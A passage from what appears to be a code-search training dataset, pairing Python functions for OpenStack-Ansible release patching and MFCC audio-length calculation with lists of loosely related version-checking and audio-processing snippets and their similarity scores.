shutil.rmtree(releases_folder)\n releases_repo = Repo.clone_from(\n url=releases_repo_url,\n to_path=releases_folder,\n branch=\"master\")\n\n LOGGER.info(\"Reading ansible-role-requirements\")\n arr, _, _ = load_yaml(kwargs['workdir'] + ARR_PATH)\n\n LOGGER.info(\"Reading releases deliverable for the given branch\")\n deliverable_file_path = ('deliverables/' + kwargs['branch'] +\n '/openstack-ansible.yaml')\n deliverable_file = releases_folder + \"/\" + deliverable_file_path\n deliverable, ind, bsi = load_yaml(deliverable_file)\n\n # if no releases yet (start of cycle), prepare releases, as a list\n if not deliverable.get('releases'):\n deliverable['releases'] = []\n\n # Ensure the new release is last\n deliverable['releases'].append(\n {'version': \"{}\".format(version),\n 'projects': []}\n )\n\n # Now we can build in the order we want and still keep std dicts\n deliverable['releases'][-1]['projects'].append(\n {'repo': 'openstack/openstack-ansible',\n 'hash': \"{}\".format(head_commit)}\n )\n\n # Select OpenStack Projects and rename them for releases.\n # Keep their SHA\n regex = re.compile('^' + OPENSTACK_REPOS + '/.*')\n for role in arr:\n if regex.match(role['src']):\n deliverable['releases'][-1]['projects'].append(\n {'repo': urlparse(role['src']).path.lstrip('/'),\n 'hash': role['version']}\n )\n\n with open(deliverable_file, 'w') as df_h:\n yaml.explicit_start = True\n yaml.block_seq_indent = bsi\n yaml.indent = ind\n yaml.dump(deliverable, df_h)\n LOGGER.info(\"Patched!\")\n\n if kwargs['commit']:\n message = \"\"\"Release OpenStack-Ansible {}/{}\n\n \"\"\".format(kwargs['branch'], version)\n releases_repo.index.add([deliverable_file_path])\n releases_repo.index.commit(message)", "def test_request_estable_version(self):\n current_stable_version = get_stable_version()\n self.assertIsNotNone(current_stable_version)", "def check_build(self, bld_num):\n # QQQ In future this should be replaced with a query to the\n # build database\n bld_dir = os.path.join(self.ver_dir, str(bld_num))\n for plat in self.plats.keys():\n if self.plats[plat]:\n # QQQ Assumes format of filename unique to couchbase-server\n files = glob.glob(\"{}/couchbase-server-enterprise?{}*{}*\".format(\n bld_dir, self.version, plat\n ))\n files = [x for x in files if not (x.endswith(\".md5\") or x.endswith(\".sha256\"))]\n if len(files) == 0:\n print (\"Platform {} is missing\".format(plat))\n return False\n return True", "def is_valid_version(self):\n pass", "def _check_version(self, project, targetdir):\r\n versionfile = os.path.join(targetdir, 'project.version')\r\n if (os.path.exists(versionfile)):\r\n file_ = open(versionfile, \"r\")\r\n projectname = file_.read().strip()\r\n file_.close()\r\n if (projectname == project.objectname):\r\n return True\r\n return False", "def check_git_support():\n proc = Popen(['git', '--version'], shell=True, stdout=PIPE,)\n msg, _ = proc.communicate()\n msg = msg.decode('utf-8')\n if \"git version\" in msg:\n return True\n return False", "def test_undefined_semver(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n expected = None\n\n self.assertEqual(v1.build, expected)", "def check_update():\n try:\n raw_version = urllib.urlopen(VERSIONFILE)\n except IOError as e:\n print UPDATE_FAIL + \"can't fetch version file: \" + str(e)\n else:\n if raw_version.getcode() == 200:\n remote_version = raw_version.read().rstrip()\n if remote_version != VERSION:\n print(UPDATE_WARN + \"version \" + remote_version + \" is available, you have version \"\n + VERSION + \"\\n\\t\" + \"to update run: \" + UPDATECOMMAND)\n else:\n print UPDATE_FAIL + \"can't fetch version file\"", "def check(self):\n current = self._get_current()\n # There is no version, so don't attempt to upgrade\n if current[-1]:\n return False\n\n highest = self._get_highest_version()\n return highest > current", "def checkVersion(self):\n try:\n respInfo = self._reqSession.get(self._host + \"/static/pythonSDKVersion.txt\")\n if respInfo.status_code != 200 or len(respInfo.text) > 20:\n return\n latestVersion = respInfo.text.strip()\n import eventregistry._version as _version\n currentVersion = _version.__version__\n for (latest, current) in zip(latestVersion.split(\".\"), currentVersion.split(\".\")):\n if int(latest) > int(current):\n logger.info(\"==============\\nYour version of the module is outdated, please update to the latest version\")\n logger.info(\"Your version is %s while the latest is %s\", currentVersion, latestVersion)\n logger.info(\"Update by calling: pip install --upgrade eventregistry\\n==============\")\n return\n # in case the server mistakenly has a lower version that the user has, don't report an error\n elif int(latest) < int(current):\n return\n except:\n pass", "def validate_commit(ctx, sha, **_):\n\n gh = ctx.obj.github\n ci_provider = ctx.obj.ci_provider\n\n sha = sha or (ci_provider.sha if ci_provider else None)\n\n def _pre_issue():\n log.echo('Commit references an issue...', break_line=False)\n\n def _post_issue():\n log.checkmark()\n\n def _pre_label():\n log.echo('Issue is labeled with a release label...', break_line=False)\n\n def _post_label():\n log.checkmark()\n\n log.echo('Validating commit', add=True)\n\n try:\n gh.validate_commit(sha=sha,\n hooks={\n 'pre_issue': _pre_issue,\n 'pre_label': _pre_label,\n 'post_issue': _post_issue,\n 'post_label': _post_label\n })\n except exceptions.ReleaseValidationFailedException as e:\n log.xmark()\n log.sub()\n tb = sys.exc_info()[2]\n utils.raise_with_traceback(e, tb)\n log.sub()\n\n log.echo('Validation passed')", "def can_safely_release(*repo_paths):\n if repo_has_uncommitted():\n return False\n if repo_has_incoming(*repo_paths):\n return False\n if repo_has_outgoing():\n return continue_with_outgoing()\n return True", "def test_get_release_pr():\n org = 'org'\n repo = 'repo'\n access_token = 'access'\n\n with patch('github.requests.get', return_value=Mock(json=Mock(return_value=FAKE_PULLS))) as get_mock:\n pr = get_release_pr(access_token, org, repo)\n get_mock.assert_called_once_with(\"https://api.github.com/repos/{org}/{repo}/pulls\".format(\n org=org,\n repo=repo,\n ), headers=github_auth_headers(access_token))\n assert pr.body == RELEASE_PR['body']\n assert pr.url == RELEASE_PR['html_url']\n assert pr.version == '0.53.3'", "def _does_require_force_update(self):\n\n if self.current_version[0][0] > self.version_yaml[0]:\n # The current version first index is greater than the one we have in the\n # current version.yaml.\n\n # We return True.\n return True\n\n # We return False, we do not need to force the update for\n # the current version number.\n return False", "def test_get_release_pr_no_pulls():\n with patch(\n 'github.requests.get', return_value=Mock(json=Mock(return_value=[OTHER_PR]))\n ):\n assert get_release_pr('access_token', 'org', 'repo-missing') is None", "def test_package_version():\n coverage_version = package_version('coverage')\n pytest_version = package_version('pytest')\n\n assert coverage_version is not None\n assert coverage_version < (1000, 0, 0)\n assert pytest_version is not None\n assert pytest_version > (5, 0)", "def check_for_updates(package_name, latest_version_str, our_version_str=VERSION):\n our = dict()\n latest = dict()\n for version, suffix in ((our, our_version_str), (latest, latest_version_str)):\n for part in ['major', 'minor', 'patch']:\n version[part], _, suffix = suffix.partition('.')\n version[part] = int(version[part])\n version['suffix'] = suffix\n\n for part in ['major', 'minor', 'patch', 'suffix']:\n if latest[part] > our[part]:\n if part == 'major':\n sys.exit(messages['UpdateRequired'].format(package_name))\n else:\n print >> sys.stderr, messages['UpdateAvailable'].format(package_name)\n return", "def isDBReleaseAvailable(dbh, version, lfns, jobPars):\n\n DBReleaseIsAvailable = False\n if version == \"\":\n tolog(\"Job parameters did not specify a DBRelease version (can not verify local availability)\")\n else:\n for lfn in lfns:\n if isDBReleaseFile(dbh, lfn):\n tolog(\"Found a DBRelease file in the input file list (will check local availability)\")\n\n # is the requested DBRelease file available locally?\n if dbh.isDBReleaseAvailable(version):\n tolog(\"%s is available locally (will not be staged-in)\" % (lfn))\n DBReleaseIsAvailable = True\n break\n\n return DBReleaseIsAvailable", "def check_branch(\n comp_name: str, branch_name: str, branch: Dict[str, defs.ComponentVersion]\n ) -> None:\n uptodate_files: Dict[pathlib.Path, Tuple[pathlib.Path, defs.ComponentFile]] = {}\n\n if not RE_BRANCH_NAME.match(branch_name):\n res.append(f\"{comp_name}: Invalid branch name: {branch_name}\")\n\n for ver, version in sorted(branch.items()):\n if not RE_VERSION_STRING.match(ver):\n res.append(f\"{comp_name}/{branch_name}: Invalid version string: {ver}\")\n\n other_cksums, driver_cksums = _split_by_existence(comp_name, branch_name, version.files)\n if version.outdated:\n update_to = [\n o_version\n for o_version in branch.values()\n if not o_version.outdated\n and _split_by_existence(comp_name, branch_name, o_version.files)[0]\n == other_cksums\n ]\n if len(update_to) != 1:\n res.append(\n f\"{comp_name}/{branch_name}/{ver}: Got {len(update_to)} possible \"\n f\"versions to update to instead of exactly one\"\n )\n else:\n bad_files = sorted(\n relpath\n for relpath, (path, fdata) in driver_cksums.items()\n if util.file_sha256sum(path) != fdata.sha256\n )\n if bad_files:\n res.append(f\"{comp_name}/{branch_name}/{ver}: Bad checksum for {bad_files}\")\n\n if not uptodate_files:\n uptodate_files = driver_cksums\n elif uptodate_files != driver_cksums:\n res.append(\n f\"{comp_name}/{branch_name}: All the up-to-date versions should \"\n f\"define the same set of files with the same checksums\"\n )\n\n if not any(not version.outdated for version in branch.values()):\n res.append(f\"{comp_name}/{branch_name}: No non-outdated versions\")", "def is_release_notes_changed(self):\n # there exists a difference between origin/master and current branch\n if self.master_diff:\n diff_releases = self.master_diff.split('##')\n unreleased_section = diff_releases[1]\n unreleased_section_lines = unreleased_section.split('\\n')\n\n adds_in_diff = 0\n removes_in_diff = 0\n\n for line in unreleased_section_lines:\n if line.startswith('+'):\n adds_in_diff += 1\n elif line.startswith('-') and not re.match(r'- *$', line):\n removes_in_diff += 1\n\n # means that at least one new line was added\n if adds_in_diff - removes_in_diff > 0:\n return True\n\n print_error(F'No new comment has been added in the release notes file: {self.release_notes_path}')\n return False", "def test_major(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n new_version_parts[0] = int(new_version_parts[0]) + 1\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is False", "def is_valid_release_notes_structure(self):\n release_notes_comments = self.latest_release_notes.split('\\n')\n\n if not release_notes_comments[-1]:\n release_notes_comments = release_notes_comments[:-1]\n\n if len(release_notes_comments) == 1 and self.is_valid_one_line_comment(release_notes_comments):\n return True\n\n elif len(release_notes_comments) <= 1:\n print_error(F'File {self.release_notes_path} is not formatted according to '\n F'release notes standards.\\nFix according to {self.LINK_TO_RELEASE_NOTES_STANDARD}')\n return False\n\n else:\n if self.is_valid_one_line_comment(release_notes_comments):\n release_notes_comments = release_notes_comments[1:]\n\n if not self.is_valid_multi_line_comment(release_notes_comments):\n print_error(F'File {self.release_notes_path} is not formatted according to '\n F'release notes standards.\\nFix according to {self.LINK_TO_RELEASE_NOTES_STANDARD}')\n return False\n\n return True", "def is_stable(self) -> bool:\n return not self.is_prerelease", "def test_releaseWithNewsfragments(self):\n runCommand(\n [\"git\", \"checkout\", \"-b\", \"release-16.11111-9001\"], cwd=self.repo.path\n )\n\n newsfragments = self.repo.child(\"twisted\").child(\"newsfragments\")\n newsfragments.makedirs()\n fragment = newsfragments.child(\"1234.misc\")\n fragment.setContent(b\"\")\n\n unrelated = self.repo.child(\"somefile\")\n unrelated.setContent(b\"Boo\")\n\n runCommand([\"git\", \"add\", fragment.path, unrelated.path], cwd=self.repo.path)\n runCommand([\"git\", \"commit\", \"-m\", \"fragment\"], cwd=self.repo.path)\n\n logs = []\n\n with self.assertRaises(SystemExit) as e:\n CheckNewsfragmentScript(logs.append).main([self.repo.path])\n\n self.assertEqual(e.exception.args, (1,))\n self.assertEqual(logs[-1], \"No newsfragments should be on the release branch.\")", "def test_sort_git_master_and_latest(self):\n identifiers = [\"latest\", \"master\", \"1.0\", \"2.0\", \"1.1\", \"1.9\", \"1.10\"]\n self.project.repo_type = REPO_TYPE_GIT\n self.project.save()\n self.project.versions.get(slug=LATEST).delete()\n\n for identifier in identifiers:\n get(\n Version,\n project=self.project,\n type=BRANCH,\n identifier=identifier,\n verbose_name=identifier,\n slug=identifier,\n )\n\n versions = list(Version.objects.filter(project=self.project))\n self.assertEqual(\n [\"master\", \"latest\", \"2.0\", \"1.10\", \"1.9\", \"1.1\", \"1.0\"],\n [v.slug for v in sort_version_aware(versions)],\n )", "def check_for_major_changes(cabal: CabalFile) -> bool:\n old_ver = cabal.get_version()\n old_tag = None\n if f'v{old_ver}' in get_tags():\n old_tag = f'v{old_ver}'\n if f'{old_ver}' in get_tags():\n old_tag = f'{old_ver}'\n if old_tag is None:\n print(f\"Couldn't find tag {old_tag} for current version; skipping revision check.\\n\")\n return False\n\n cmd = ['git', 'diff', '--name-only', f'{old_tag}..HEAD']\n changed_files = [ l.strip()\n for l in check_output(cmd).decode('UTF-8').split('\\n')\n if len(l.strip()) > 0 ]\n non_cabals = [ f\n for f in changed_files\n if not f.endswith('.cabal') ]\n print(f\"{len(changed_files)} files have changed since {old_tag}:\\n \",\n ' \\n'.join(changed_files))\n\n if len(non_cabals) > 0:\n return False\n else:\n print(dedent(f'''\n It appears that the only changes between {old_tag} and now are in the\n cabal file. Perhaps you want to make a revision instead?\n\n y = make a revision\n n = do a full release anyways\n d = show me a diff\n '''))\n while True:\n resp = prompt_for_char('How to proceed?', options='ynd')\n if resp == 'd':\n cmd = ['git', 'diff', f'{old_tag}..HEAD']\n print(' '.join(cmd))\n check_call(cmd)\n elif resp == 'y':\n return True\n elif resp == 'n':\n return False", "def get_release_info(self, release):\n rel_os = release.operating_system.lower()\n version = release.version\n\n release_info = filter(\n lambda r: (\n r['os'] == rel_os and\n ClusterPlugins.is_release_version_compatible(version,\n r['version'])),\n self.plugin.releases)\n\n return release_info[0]", "def test_installed_beta_no_newer_stable(self):\n self.change_version(self.version_1_2_2, '1.2beta')\n self.change_status(self.version_1_2_2, amo.STATUS_BETA)\n\n version, file = self.get('1.2beta', self.version_int,\n self.app, self.platform)\n assert version == self.version_1_2_1", "def commit_check(ctx):\n result = ctx.run(f\"{VENV_PREFIX} cz check --rev-range master..\", warn=True)\n if result.exited == 3: # NO_COMMIT_FOUND\n exit(0)\n else:\n exit(result.exited)", "def tag_release():\n # We're assuming that setup.py has already been updated\n # manually or using scripts/release/bump-version so the\n # current version in setup.py is the version number we should tag.\n version_number = get_current_version_number()\n click.echo(\"Tagging %s release\" % version_number)\n subprocess.check_call(\n ['git', 'tag', '-a', version_number,\n '-m', 'Tagging %s release' % version_number],\n )", "def test_higher_version_preferred_even_when_tag_is_on_top_of_the_tree(self):\n try:\n self.prepare(tag_latest_version=True)\n self.assertEquals((1, 3, 0), compute_version(\n get_git_describe(repository_directory=self.repo, fix_environment=True, accepted_tag_pattern='repo-*')\n ))\n finally:\n rmtree(self.repo)\n os.chdir(self.oldcwd)", "def test__releases_in_range_current(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 0): '',\n })\n ver = U.UCS_Version((MAJOR, MINOR, 0))\n versions = self.u._releases_in_range()\n self.assertEqual([ver], versions)", "def test_too_many_releases():\n pulls = [RELEASE_PR, RELEASE_PR]\n with pytest.raises(Exception) as ex, patch(\n 'github.requests.get', return_value=Mock(json=Mock(return_value=pulls))\n ):\n get_release_pr('access_token', 'org', 'repo')\n\n assert ex.value.args[0] == \"More than one pull request for the branch release-candidate\"", "def verify_up_to_date(path, branch=\"master\"):\n\n sys.stdout.write(\" - Verifying your branch up to date:\")\n run_in_component(path, ['git', 'remote', 'update'])\n\n result = run_in_component(path, ['git', 'rev-list', 'HEAD...origin/%s' % branch, '--count'])\n count = int(result.strip())\n\n if count == 0:\n print(\" OKAY\")\n return\n\n print(\" FAILED\")\n\n raise GenericError(\"You branch is not up-to-date with remote branch: %d different commits\" % count)", "def test_release(self):\n r = self.d.release(1)\n self.assertEqual(r.title, 'Stockholm')", "def validate_change(ticket):\n # First ensure topic line mentions tickets, and pull them out.\n topic = COMMIT_MSG.split('\\n', 1)[0]\n fix_tickets = re.findall(\"[A-Z]{2,5}-[0-9]{1,6}\", topic)\n if len(fix_tickets) == 0:\n print \"\\n\\n\\n\\n\\n*********\\nERROR: commit message does not name a ticket!\"\n return False\n\n # Now get list of approved tickets from master ticket, and ensure\n # all \"fixed\" tickets are approved.\n approved_tickets = get_approved_tickets(ticket)\n for tick in fix_tickets:\n if not tick in approved_tickets:\n print \"\\n\\n\\n\\n\\n*********\\nERROR: ticket {} is not approved (see approval ticket {})\".format(\n tick, ticket)\n return False\n return True", "def test_bump_minor(version: str, bumped: str) -> None:\n assert bump(version, \"minor\") == bumped", "def test_version_missing(self):\r\n self.assertIsNone(self._version_test(self.no_version))", "def get_github_library_version(name, url):\n while True:\n # For the release, make sure the default versions do not include \"-dev\"\n version = raw_input(\"Version of %s?: \" % name)\n if not url_exists(\"%s/releases/tag/%s\" % (url, version)):\n print_warning(\"The version of %s is not valid. Ensure you've chosen a correct value by checking the \"\n \"GitHub releases for exact naming at \"\n \"%s/releases before you continue.\" % (name, url))\n return version", "def test_beta_updates_to_stable(self):\n self.change_version(self.version_1_2_0, '1.2beta')\n self.change_status(self.version_1_2_0, amo.STATUS_BETA)\n self.change_status(self.version_1_2_2, amo.STATUS_BETA)\n\n version, file = self.get('1.2beta', self.version_int,\n self.app, self.platform)\n assert version == self.version_1_2_1", "def test_higher_version_always_preferred(self):\n try:\n self.prepare()\n self.assertEquals((1, 2, 4), compute_version(\n get_git_describe(repository_directory=self.repo, fix_environment=True, accepted_tag_pattern='repo-*')\n ))\n finally:\n rmtree(self.repo)\n os.chdir(self.oldcwd)", "def verify_Version_buildNumber():\r\n msg, flag = \"\", False\r\n try:\r\n 'Getting Build number for IOS '\r\n if g.platform == 'ios':\r\n flag1, msg1 = verify_ios_versionNumber()\r\n msg += msg1\r\n flag2, msg2 = verify_ios_buildNumber()\r\n msg += msg2\r\n 'go back'\r\n flag3=ui_controls.image(get_obj_identifier('about_back_btn'))\r\n print 'cliked on back button'\r\n flag = False if not (flag1 and flag2 and flag3) else True\r\n else:\r\n text_view = ui_controls.text_view(get_obj_identifier('about_buildVersion_lbl'))\r\n \r\n if text_view.strip() == g.android_version_no.strip():\r\n \r\n print \"Version and Build number matched. Expected : %s. Actual : %s\" % (g.android_version_no, text_view.strip())\r\n flag = True \r\n else:\r\n \r\n print \"Version and Build number does not match. Expected : %s. Actual : %s\" % (g.android_version_no, text_view.strip())\r\n flag1=ui_controls.back_button()\r\n \r\n flag = False if not (flag1) else True\r\n except Exception as excp:\r\n traceback.print_exc()\r\n msg += str(excp)\r\n return flag, msg", "def check_version():\n err = \"PaddlePaddle version 1.6 or higher is required, \" \\\n \"or a suitable develop version is satisfied as well. \\n\" \\\n \"Please make sure the version is good with your code.\" \\\n\n try:\n fluid.require_version('1.6.0')\n except Exception as e:\n logger.error(err)\n sys.exit(1)", "def test_release_tag_for_empty(self) -> None:\n with self.assertRaisesRegexp(ValueError, \"Unable to parse version \"):\n release_tag()", "async def test_finish_release_no_release(doof, repo_info, event_loop, mocker):\n get_release_pr_mock = mocker.patch('bot.get_release_pr', autospec=True, return_value=None)\n with pytest.raises(ReleaseException) as ex:\n await doof.run_command(\n manager='mitodl_user',\n channel_id=repo_info.channel_id,\n words=['finish', 'release'],\n loop=event_loop,\n )\n assert 'No release currently in progress' in ex.value.args[0]\n org, repo = get_org_and_repo(repo_info.repo_url)\n get_release_pr_mock.assert_called_once_with(GITHUB_ACCESS, org, repo)", "def check_os_version():\n if not version.is_supported_version():\n supported_releases = []\n for rel in version.SUPPORTED_VERSIONS:\n for ver in version.SUPPORTED_VERSIONS[rel]:\n supported_releases.append(rel.upper() + ' ' + ver)\n reporting.create_report([\n reporting.Title(\n 'The installed OS version is not supported for the in-place upgrade to the target RHEL version'\n ),\n reporting.Summary(\n 'The supported OS releases for the upgrade process:\\n'\n ' {}'.format('\\n'.join(supported_releases))\n ),\n reporting.Severity(reporting.Severity.HIGH),\n reporting.Groups(COMMON_REPORT_TAGS),\n reporting.Groups([reporting.Groups.INHIBITOR]),\n # we want to set a static Key here because of different Title per path\n reporting.Key('1c7a98849a747ec9890f04bf4321de7280970715')\n ] + related)", "def check_for_update():\n\n # get most recent commit\n r = requests.get('https://api.github.com/repos/PokeMiners/game_masters/git/refs/heads/master')\n\n with open('forms.json', 'r') as f:\n forms = json.load(f)\n last_commit = forms['commit']\n\n # check if most recent commit is the same as the commit of the last downloaded game_master\n if r.status_code == 200:\n latest = json.loads(r.text)\n recent_commit = latest['object']['sha']\n if recent_commit == last_commit:\n return False\n\n print('New version of game_master found')\n r = requests.get('https://raw.githubusercontent.com/PokeMiners/game_masters/master/latest/latest.json')\n if r.status_code != 200:\n print('Couldn\\'t access latest game_master (did the url change?)', file=sys.stderr)\n return False\n \n # save new game_master\n game_master = json.loads(r.text)\n with open('game_master.json', 'w') as f:\n json.dump(game_master, f, indent=4)\n\n # store commit of current game_master\n with open('forms.json', 'w') as f:\n forms['commit'] = recent_commit\n json.dump(forms, f, indent=4)\n\n return True", "def test_ge_master(\n self, aiosmtpd_version: version.Version, capsys: pytest.CaptureFixture\n ):\n reference = \"master:aiosmtpd/__init__.py\"\n cmd = f\"git show {reference}\".split()\n try:\n with capsys.disabled():\n master_smtp = subprocess.check_output(cmd).decode() # nosec\n except subprocess.CalledProcessError:\n pytest.skip(\"Skipping due to git error\")\n return\n for ln in master_smtp.splitlines():\n m = RE_DUNDERVER.match(ln)\n if m:\n break\n else:\n pytest.fail(f\"Cannot find __version__ in {reference}!\")\n master_ver = version.parse(m.group(\"ver\"))\n assert aiosmtpd_version >= master_ver, \"Version number cannot be < master's\"", "def version_check(self):\n param_name = \"rethink/software_version\"\n sdk_version = settings.SDK_VERSION\n\n # get local lock for rosparam threading bug\n with self.__class__.param_lock:\n robot_version = rospy.get_param(param_name, None)\n if not robot_version:\n rospy.logwarn(\"RobotEnable: Failed to retrieve robot version \"\n \"from rosparam: %s\\n\"\n \"Verify robot state and connectivity \"\n \"(i.e. ROS_MASTER_URI)\", param_name)\n return False\n else:\n # parse out first 3 digits of robot version tag\n pattern = (\"^([0-9]+)\\.([0-9]+)\\.([0-9]+)\")\n match = re.search(pattern, robot_version)\n if not match:\n rospy.logwarn(\"RobotEnable: Invalid robot version: %s\",\n robot_version)\n return False\n robot_version = match.string[match.start(1):match.end(3)]\n if robot_version not in settings.VERSIONS_SDK2ROBOT[sdk_version]:\n errstr_version = \"\"\"RobotEnable: Software Version Mismatch.\nRobot Software version (%s) does not match local SDK version (%s). Please\nUpdate your Robot Software. \\\nSee: http://sdk.rethinkrobotics.com/wiki/Software_Update\"\"\"\n rospy.logerr(errstr_version, robot_version, sdk_version)\n return False\n return True", "def check_build_status(owner, repository, ref):\n return get_hvcs().check_build_status(owner, repository, ref)", "async def test_release_in_progress(doof, repo_info, event_loop, mocker, command):\n version = '1.2.3'\n url = 'http://fake.release.pr'\n mocker.patch('bot.get_release_pr', autospec=True, return_value=ReleasePR(\n version=version,\n url=url,\n body='Release PR body',\n ))\n\n command_words = command.split() + [version]\n with pytest.raises(ReleaseException) as ex:\n await doof.run_command(\n manager='mitodl_user',\n channel_id=repo_info.channel_id,\n words=command_words,\n loop=event_loop,\n )\n assert ex.value.args[0] == \"A release is already in progress: {}\".format(url)", "def vtk_version_ok(major, minor, build):\n requested_version = (100 * int(major) + int(minor)) * 100000000 + int(build)\n ver = vtkVersion()\n actual_version = (100 * ver.GetVTKMajorVersion() + ver.GetVTKMinorVersion()) \\\n * 100000000 + ver.GetVTKBuildVersion()\n if actual_version >= requested_version:\n return True\n else:\n return False", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def check_for_updates():\n last_version = str(request.urlopen(__source__).read().decode(\"utf8\"))\n if str(open(__file__).read()) != last_version:\n log.warning(\"Theres new Version available!, Update from \" + __source__)\n else:\n log.info(\"No new updates!,You have the lastest version of this app.\")", "def is_versioned(target):\n\n assert os.path.exists(target), \"%s does not exist!\" % target\n git_tree = get_git_tree(target)\n\n versioned = False\n if git_tree is not None:\n output = gitopen([\"status\", \"--ignored\", \"--porcelain\", target], git_tree)\n if not (output.startswith(b\"!!\") or output.startswith(b\"??\")):\n versioned = True\n\n return versioned" ]
[ "0.69423383", "0.6784403", "0.66795766", "0.6649919", "0.6507445", "0.64944094", "0.63654304", "0.6350596", "0.6347604", "0.63336277", "0.6305721", "0.6219666", "0.62047046", "0.61802447", "0.6172858", "0.612331", "0.6118963", "0.6113204", "0.6088553", "0.60614514", "0.60483974", "0.6042252", "0.60349816", "0.5964456", "0.59581023", "0.59537", "0.59341335", "0.5920642", "0.5894531", "0.58798224", "0.5879559", "0.58659893", "0.5849183", "0.5831574", "0.58128935", "0.57728636", "0.57661736", "0.57623553", "0.5751964", "0.5743015", "0.57273674", "0.5714646", "0.57014716", "0.5695072", "0.56911373", "0.56899685", "0.56805974", "0.56713086", "0.56658286", "0.56537205", "0.56473076", "0.5625349", "0.5623772", "0.5618431", "0.5617925", "0.5596673", "0.55845445", "0.5576501", "0.5573185", "0.5564981", "0.5551658", "0.5549566", "0.55421424", "0.5541864", "0.55306077", "0.55224156", "0.55115044", "0.55071557", "0.5506876", "0.54922307", "0.54882133", "0.548688", "0.5479357", "0.54761577", "0.5474809", "0.5473272", "0.54721004", "0.54675037", "0.54670006", "0.54610306", "0.5439877", "0.54304093", "0.54293716", "0.5428319", "0.54269487", "0.54242617", "0.5422349", "0.5421082", "0.54168713", "0.5411046", "0.5409721", "0.5409114", "0.5394566", "0.5393198", "0.5380802", "0.5373157", "0.5367806", "0.5366845", "0.53608334", "0.53607374" ]
0.73628855
0
Evaluate the mfcc_length for a given file
def get_mfcc_length_from_duration(duration): length = int(duration // FRAME_STRIDE) - 1 return length
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def wav2mfcc(file_path, max_len=44, n_mfcc=20):", "def mfcc(path, windowsize, overlap, M):\n srate, data = scipy.io.wavfile.read(path)\n\n bank = filterbank(0, srate/2, M, srate, windowsize)\n buckets = bucketize(data/32768.0, windowsize, overlap)\n energies = buckets.dot(bank.transpose())\n\n return scipy.fftpack.dct(numpy.log10(energies))", "def extract_mfccs(file_name, pad_len=174, n_mfcc=40):\n\n signal, sr = librosa.load(file_name, res_type='kaiser_fast')\n mfccs = librosa.feature.mfcc(signal, sr=sr, n_mfcc=n_mfcc)\n\n if mfccs.shape[1] > pad_len:\n mfccs = mfccs[:, :pad_len]\n else:\n pad_width = pad_len - mfccs.shape[1]\n mfccs = np.pad(mfccs, ((0, 0), (0, pad_width)), mode='constant')\n\n return mfccs", "def findFLength(filename):\n f = os.popen('wc -l < {}'.format(filename))\n return int(f.read())", "def get_recording_length(file_path):\n f = open(file_path, 'rb')\n header = f.read(256)\n f.close()\n \n return int(header[236:244].decode('ascii'))", "def sox_get_audio_length(self, audio_file):\n logging.info('Getting source file length ...')\n result = self._process_command('soxi -D \"%s\"' % audio_file, PIPE)\n if result[1][0] != '':\n return float(result[1][0].strip('\\n'))\n else:\n return 1000", "def wav2mfcc(file_path):\r\n #Load .wav to array\r\n wave, _ = librosa.load(file_path, mono=Constants.channelMap[Tunable.tunableDict['channels']], sr=Tunable.tunableDict['samplingRate'])\r\n wave = np.asfortranarray(wave)\r\n\r\n #Convert to Mel-Frequency Cepstral Coefficients\r\n mfcc = librosa.feature.mfcc(wave, sr=Tunable.tunableDict['samplingRate'], n_mfcc=Tunable.tunableDict['buckets'])\r\n\r\n # If maximum length exceeds mfcc lengths then pad the remaining ones\r\n if Tunable.tunableDict['maxLen'] > mfcc.shape[1]:\r\n pad_width = Tunable.tunableDict['maxLen'] - mfcc.shape[1]\r\n mfcc = np.pad(mfcc, pad_width=((0, 0), (0, pad_width)), mode='minimum')\r\n\r\n # Else cutoff the remaining parts\r\n else:\r\n mfcc = mfcc[:, :Tunable.tunableDict['maxLen']]\r\n\r\n return [mfcc]", "def compute_data_len(data_file):\n max_src_len = -1\n max_target_len = -1\n\n sum_src_lens = 0.0\n sum_target_lens = 0.0\n\n num_entries = 0\n all_src_lens = []\n all_target_lens = []\n\n # Maintain frequency statistics\n src_counter = collections.Counter()\n target_counter = collections.Counter()\n\n with open(data_file, \"r\") as f:\n for line in f:\n _, src, target = line.split(\"\\t\")\n curr_src_len = len(src.strip().split(\" \"))\n curr_target_len = len(target.strip().split(\" \"))\n\n all_src_lens.append(curr_src_len)\n all_target_lens.append(curr_target_len)\n\n src_counter[curr_src_len] += 1\n target_counter[curr_target_len] += 1\n\n sum_src_lens += curr_src_len\n sum_target_lens += curr_target_len\n\n if curr_src_len > max_src_len:\n max_src_len = curr_src_len\n\n if curr_target_len > max_target_len:\n max_target_len = curr_target_len\n\n num_entries += 1\n\n print \"Max source length: \", max_src_len\n print \"Max target length: \", max_target_len\n\n print \"Avg source length: \", sum_src_lens / num_entries\n print \"Avg target length: \", sum_target_lens / num_entries\n\n\n threshold = 350\n get_cdf(threshold, src_counter)\n get_cdf(threshold, target_counter)", "def SentenceLength(f):\n\tcounter=0\n\twith open(filename) as f:\n\t\tread = csv.reader(f)\n\t\tfor row in read:\n\t\t\t#Original\n\t\t\tzin0=row[0].split()\n\t\t\t#Human Translation\n\t\t\tzin1=row[1].split()\n\t\t\t#Machine Translation\n\t\t\tzin2=row[2].split()\n\t\t\tcounter+=1\n\t\t\t#PRINT LENGTH DIFFERENCE\n\t\t\t#print(\"HT\",counter,(abs(len(zin0)- len(zin1))))\n\t\t\tprint(\"MT\",counter,(abs(len(zin0)- len(zin2))))", "def mfcc(wav_path, delta = 2):\n y, sr = librosa.load(wav_path)\n # MEL frequency cepstrum coefficient\n mfcc_feat = librosa.feature.mfcc(y = y, sr = sr, n_mfcc = 13)\n ans = [mfcc_feat]\n # Calculate the 1st derivative\n if delta >= 1:\n mfcc_delta1 = librosa.feature.delta(mfcc_feat, order = 1, mode ='nearest')\n ans.append(mfcc_delta1)\n # Calculate the 2nd derivative\n if delta >= 2:\n mfcc_delta2 = librosa.feature.delta(mfcc_feat, order = 2, mode ='nearest')\n ans.append(mfcc_delta2)\n return np.transpose(np.concatenate(ans, axis = 0),[1,0])", "def proc_one(filename):\n (rate, sig) = wav.read(filename)\n assert rate == samp_rate\n # since templates have max value of 32768, normalise it\n if sig.max() > 1:\n 